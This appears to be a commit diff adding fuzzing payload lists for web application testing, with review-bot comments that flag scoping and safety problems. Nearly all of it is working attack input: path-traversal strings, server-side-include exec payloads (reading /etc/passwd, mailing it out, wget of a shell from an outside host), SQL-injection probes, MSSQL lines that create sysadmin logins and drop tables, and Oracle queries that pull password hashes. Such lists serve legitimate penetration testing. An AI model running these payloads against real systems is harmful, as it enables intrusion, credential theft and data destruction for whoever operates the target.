/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/..//{FILE}
|
||||
/..//..//{FILE}
|
||||
/..//..//..//{FILE}
|
||||
/..//..//..//..//{FILE}
|
||||
/..//..//..//..//..//{FILE}
|
||||
/..//..//..//..//..//..//{FILE}
|
||||
/..//..//..//..//..//..//..//{FILE}
|
||||
/..//..//..//..//..//..//..//..//{FILE}
|
||||
/..///{FILE}
|
||||
/..///..///{FILE}
|
||||
/..///..///..///{FILE}
|
||||
/..///..///..///..///{FILE}
|
||||
/..///..///..///..///..///{FILE}
|
||||
/..///..///..///..///..///..///{FILE}
|
||||
/..///..///..///..///..///..///..///{FILE}
|
||||
/..///..///..///..///..///..///..///..///{FILE}
|
||||
/..\\{FILE}
|
||||
/..\\..\\{FILE}
|
||||
/..\\..\\..\\{FILE}
|
||||
/..\\..\\..\\..\\{FILE}
|
||||
/..\\..\\..\\..\\..\\{FILE}
|
||||
/..\\..\\..\\..\\..\\..\\{FILE}
|
||||
/..\\..\\..\\..\\..\\..\\..\\{FILE}
|
||||
/..\\..\\..\\..\\..\\..\\..\\..\\{FILE}
|
||||
/..\\\{FILE}
|
||||
/..\\\..\\\{FILE}
|
||||
/..\\\..\\\..\\\{FILE}
|
||||
/..\\\..\\\..\\\..\\\{FILE}
|
||||
/..\\\..\\\..\\\..\\\..\\\{FILE}
|
||||
/..\\\..\\\..\\\..\\\..\\\..\\\{FILE}
|
||||
/..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}
|
||||
/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}
|
||||
/./\/./{FILE}
|
||||
/./\/././\/./{FILE}
|
||||
/./\/././\/././\/./{FILE}
|
||||
/./\/././\/././\/././\/./{FILE}
|
||||
/./\/././\/././\/././\/././\/./{FILE}
|
||||
/./\/././\/././\/././\/././\/././\/./{FILE}
|
||||
/./\/././\/././\/././\/././\/././\/././\/./{FILE}
|
||||
/./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}
|
||||
/.\/\.\{FILE}
|
||||
/.\/\.\.\/\.\{FILE}
|
||||
/.\/\.\.\/\.\.\/\.\{FILE}
|
||||
/.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
|
||||
/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
|
||||
/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
|
||||
/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
|
||||
/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}
|
||||
/./../{FILE}
|
||||
/./.././../{FILE}
|
||||
/./.././.././../{FILE}
|
||||
/./.././.././.././../{FILE}
|
||||
/./.././.././.././.././../{FILE}
|
||||
/./.././.././.././.././.././../{FILE}
|
||||
/./.././.././.././.././.././.././../{FILE}
|
||||
/./.././.././.././.././.././.././.././../{FILE}
|
||||
/.\..\{FILE}
|
||||
/.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\.\..\.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}
|
||||
/.//..//{FILE}
|
||||
/.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//.//..//.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}
|
||||
/.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/../{FILE}
|
||||
/../..//{FILE}
|
||||
/../..//../{FILE}
|
||||
/../..//../..//{FILE}
|
||||
/../..//../..//../{FILE}
|
||||
/../..//../..//../..//{FILE}
|
||||
/../..//../..//../..//../{FILE}
|
||||
/../..//../..//../..//../..//{FILE}
|
||||
/..\{FILE}
|
||||
/..\..\\{FILE}
|
||||
/..\..\\..\{FILE}
|
||||
/..\..\\..\..\\{FILE}
|
||||
/..\..\\..\..\\..\{FILE}
|
||||
/..\..\\..\..\\..\..\\{FILE}
|
||||
/..\..\\..\..\\..\..\\..\{FILE}
|
||||
/..\..\\..\..\\..\..\\..\..\\{FILE}
|
||||
/..///{FILE}
|
||||
/../..///{FILE}
|
||||
/../..//..///{FILE}
|
||||
/../..//../..///{FILE}
|
||||
/../..//../..//..///{FILE}
|
||||
/../..//../..//../..///{FILE}
|
||||
/../..//../..//../..//..///{FILE}
|
||||
/../..//../..//../..//../..///{FILE}
|
||||
/..\\\{FILE}
|
||||
/..\..\\\{FILE}
|
||||
/..\..\\..\\\{FILE}
|
||||
/..\..\\..\..\\\{FILE}
|
||||
/..\..\\..\..\\..\\\{FILE}
|
||||
/..\..\\..\..\\..\..\\\{FILE}
|
||||
/..\..\\..\..\\..\..\\..\\\{FILE}
|
||||
/..\..\\..\..\\..\..\\..\..\\\{FILE}
|
||||
/\..%2f
|
||||
/\..%2f\..%2f
|
||||
/\..%2f\..%2f\..%2f
|
||||
/\..%2f\..%2f\..%2f\..%2f
|
||||
/\..%2f\..%2f\..%2f\..%2f\..%2f
|
||||
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f
|
||||
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f
|
||||
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
|
2241
attack/rfi/rfi.txt
Normal file
2241
attack/rfi/rfi.txt
Normal file
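--- a/attack/server-side-include/server-side-includes-generic.txt
+++ b/attack/server-side-include/server-side-includes-generic.txt
@@ -0,0 +1,78 @@
+<!--#config errmsg="File not found, informs users and password"-->
+<!--#config timefmt="A %B %d %Y %r"-->
+<!--#echo var="auth_type" -->
+<!--#echo var="content_length" -->
+<!--#echo var="content_type" -->
+<!--#echo var="date_gmt" -->
+<!--#echo var="date_local" -->
+<!--#echo var="DATE_LOCAL" -->
+<!--#echo var="document_name" -->
+<!--#echo var="DOCUMENT_NAME" -->
+<!--#echo var="document_root" -->
+<!--#echo var="document_uri" -->
+<!--#echo var="DOCUMENT_URI" -->
+<!--#echo var="forwarded" -->
+<!--#echo var="from" -->
+<!--#echo var="gateway_interface" -->
+<!--#echo var="http_accept" -->
+<!--#echo var="http_accept_charset" -->
+<!--#echo var="http_accept_encoding" -->
+<!--#echo var="http_accept_language" -->
+<!--#echo var="http_client_ip" -->
+<!--#echo var="http_connection" -->
+<!--#echo var="http_cookie" -->
+<!--#echo var="http_form" -->
+<!--#echo var="http_host" -->
+<!--#echo var="http_referer" -->
+<!--#echo var="http_ua_cpu" -->
+<!--#echo var="http_ua_os" -->
+<!--#echo var="http_user_agent" -->
+<!--#echo var="last_modified" -->
+<!--#echo var="netsite_root" -->
+<!--#echo var="page_count" -->
+<!--#echo var="path" -->
+<!--#echo var="path_info" -->
+<!--#echo var="path_info_translated" -->
+<!--#echo var="path_translated" -->
+<!--#echo var="query_string" -->
+<!--#echo var="query_string_unescaped" -->
+<!--#echo var="remote_addr" -->
+<!--#echo var="remote_host" -->
+<!--#echo var="remote_ident" -->
+<!--#echo var="remote_port" -->
+<!--#echo var="remote_user" -->
+<!--#echo var="request_method" -->
+<!--#echo var="request_uri" -->
+<!--#echo var="script_filename" -->
+<!--#echo var="script_name" -->
+<!--#echo var="script_uri" -->
+<!--#echo var="script_url" -->
+<!--#echo var="server_addr" -->
+<!--#echo var="server_admin" -->
+<!--#echo var="server_name -->
+<!--#echo var="server_port" -->
+<!--#echo var="server_protocol" -->
+<!--#echo var="server_software" -->
+<!--#echo var="site_htmlroot" -->
+<!--#echo var="total_hits" -->
+<!--#echo var="tz" -->
+<!--#echo var="unique_id" -->
+<!--#echo var="user_name" -->
+<!--#exec cmd="/bin/ls /" -->
+<!--#exec cmd="/bin/ls /" --><br/>
+<!--#exec cmd="cat /etc/passwd" --><br/>
+<!--#exec cmd="cd C:\WINDOWS\System32">
+<!--#exec cmd="dir" -->
+<!--#exec cmd="find / -name *.* -print" --><br/>
+<!--#exec cmd="ls" -->
+<!--#exec cmd="mail email@dom.tld <mailto:email@dom.tld> < cat /etc/passwd" --><br/>
+<!--#exec cmd="wget http://website.com/dir/shell.txt" -->
+<!--#exec cmd="whoami"-->
+<!--#flastmod virtual="echo.html" -->
+<!--#fsize file="ssi.shtml" -->
+<!--#include file=?UUUUUUUU...UU?-->
+<!--#printenv -->
+<pre><!--#echo var="DATE_LOCAL" --> </pre>
+<pre><!--#exec cmd="dir" --></pre>
+<pre><!--#exec cmd="ls" --></pre>
+<pre><!--#exec cmd="whoami"--></pre>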
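Review bot: The `exec` entry `wget http://website.com/dir/shell.txt` near the end of this list names a registrable third-party domain instead of a placeholder. When the list is replayed against a system under test, any entry that fires makes that system contact a host outside the engagement, which is both a scoping problem and noise for whoever owns that host. A reserved name such as `example.com` (RFC 2606) or a substitution token in the style of the `{FILE}`, `__TIME__` and `<attackerip>` markers used elsewhere in this commit would avoid that. The same applies to `ping 10.10.1.2` in detect/MSSQL.txt, `httP://192.168.1.1/` in detect/oracle.txt, and `ping 172.10.1.255` and `nslookup www.google.com` in detect/xplatform.txt; note that 172.10.0.0/16 is not RFC 1918 private space.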
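--- a/attack/sql-injection/detect/GenericBlind.txt
+++ b/attack/sql-injection/detect/GenericBlind.txt
@@ -0,0 +1,41 @@
+sleep(__TIME__)#
+1 or sleep(__TIME__)#
+" or sleep(__TIME__)#
+' or sleep(__TIME__)#
+" or sleep(__TIME__)="
+' or sleep(__TIME__)='
+1) or sleep(__TIME__)#
+") or sleep(__TIME__)="
+') or sleep(__TIME__)='
+1)) or sleep(__TIME__)#
+")) or sleep(__TIME__)="
+')) or sleep(__TIME__)='
+;waitfor delay '0:0:__TIME__'--
+);waitfor delay '0:0:__TIME__'--
+';waitfor delay '0:0:__TIME__'--
+";waitfor delay '0:0:__TIME__'--
+');waitfor delay '0:0:__TIME__'--
+");waitfor delay '0:0:__TIME__'--
+));waitfor delay '0:0:__TIME__'--
+'));waitfor delay '0:0:__TIME__'--
+"));waitfor delay '0:0:__TIME__'--
+benchmark(10000000,MD5(1))#
+1 or benchmark(10000000,MD5(1))#
+" or benchmark(10000000,MD5(1))#
+' or benchmark(10000000,MD5(1))#
+1) or benchmark(10000000,MD5(1))#
+") or benchmark(10000000,MD5(1))#
+') or benchmark(10000000,MD5(1))#
+1)) or benchmark(10000000,MD5(1))#
+")) or benchmark(10000000,MD5(1))#
+')) or benchmark(10000000,MD5(1))#
+pg_sleep(__TIME__)--
+1 or pg_sleep(__TIME__)--
+" or pg_sleep(__TIME__)--
+' or pg_sleep(__TIME__)--
+1) or pg_sleep(__TIME__)--
+") or pg_sleep(__TIME__)--
+') or pg_sleep(__TIME__)--
+1)) or pg_sleep(__TIME__)--
+")) or pg_sleep(__TIME__)--
+')) or pg_sleep(__TIME__)--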
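Review bot: The ten `benchmark(10000000,MD5(1))` entries hard-code their cost, while every `sleep`, `waitfor delay` and `pg_sleep` entry in the same file takes the `__TIME__` token. A tester who lowers `__TIME__` to keep a shared database responsive still gets the full fixed CPU load from these lines, and the delay they produce depends on the server's speed, so it is also a weaker timing signal. Replacing the iteration count with a second substitution token would let both families be bounded from one place.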
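--- a/attack/sql-injection/detect/Generic_SQLI.txt
+++ b/attack/sql-injection/detect/Generic_SQLI.txt
@@ -0,0 +1 @@
+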
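--- a/attack/sql-injection/detect/MSSQL.txt
+++ b/attack/sql-injection/detect/MSSQL.txt
@@ -0,0 +1,16 @@
+'; exec master..xp_cmdshell 'ping 10.10.1.2'--
+'create user name identified by 'pass123' --
+'create user name identified by pass123 temporary tablespace temp default tablespace users;
+' ; drop table temp --
+'exec sp_addlogin 'name' , 'password' --
+' exec sp_addsrvrolemember 'name' , 'sysadmin' --
+' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
+' grant connect to name; grant resource to name; --
+' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
+' or 1=1 --
+' union (select @@version) --
+' union (select NULL, (select @@version)) --
+' union (select NULL, NULL, (select @@version)) --
+' union (select NULL, NULL, NULL, (select @@version)) --
+' union (select NULL, NULL, NULL, NULL, (select @@version)) --
+' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --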
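Review bot: Several entries in this `detect/` list change server state rather than probe for it: `' ; drop table temp --`, `exec sp_addlogin`, `exec sp_addsrvrolemember 'name' , 'sysadmin'`, the two `create user` lines and the `insert into users(...)` line. A detection pass is normally expected to be safe to run unattended; if one of these lands on an injectable parameter it leaves accounts or dropped objects behind that then need clean-up and triage. They fit better beside the files under `attack/sql-injection/exploit/`, leaving read-only probes such as the `union (select @@version)` family here. The same applies to `myappadmin.adduser('admin', 'newpass')` in detect/oracle.txt. The file is also named for MSSQL but carries `identified by ... tablespace` (Oracle syntax) and `insert into mysql.user` (MySQL), which misattributes results when coverage is tracked per DBMS.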
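--- a/attack/sql-injection/detect/MSSQL_blind.txt
+++ b/attack/sql-injection/detect/MSSQL_blind.txt
@@ -0,0 +1,8 @@
+'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
+'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
+'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
+'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
+'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
+'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' --
+'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
+'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --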
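--- a/attack/sql-injection/detect/MySQL.txt
+++ b/attack/sql-injection/detect/MySQL.txt
@@ -0,0 +1,9 @@
+1'1
+1 exec sp_ (or exec xp_)
+1 and 1=1
+1' and 1=(select count(*) from tablenames); --
+1 or 1=1
+1' or '1'='1
+1or1=1
+1'or'1'='1
+fake@ema'or'il.nl'='il.nl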
10
attack/sql-injection/detect/MySQL_MSSQL.txt
Normal file
10
attack/sql-injection/detect/MySQL_MSSQL.txt
Normal file
|
@ -0,0 +1,10 @@
|
|||
1
|
||||
1 and user_name() = 'dbo'
|
||||
\'; desc users; --
|
||||
1\'1
|
||||
1' and non_existant_table = '1
|
||||
' or username is not NULL or username = '
|
||||
1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
|
||||
1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
|
||||
1 uni/**/on select all from where
|
||||
|
55
attack/sql-injection/detect/oracle.txt
Normal file
55
attack/sql-injection/detect/oracle.txt
Normal file
|
@ -0,0 +1,55 @@
|
|||
’ or ‘1’=’1
|
||||
' or '1'='1
|
||||
'||utl_http.request('httP://192.168.1.1/')||'
|
||||
' || myappadmin.adduser('admin', 'newpass') || '
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i
|
||||
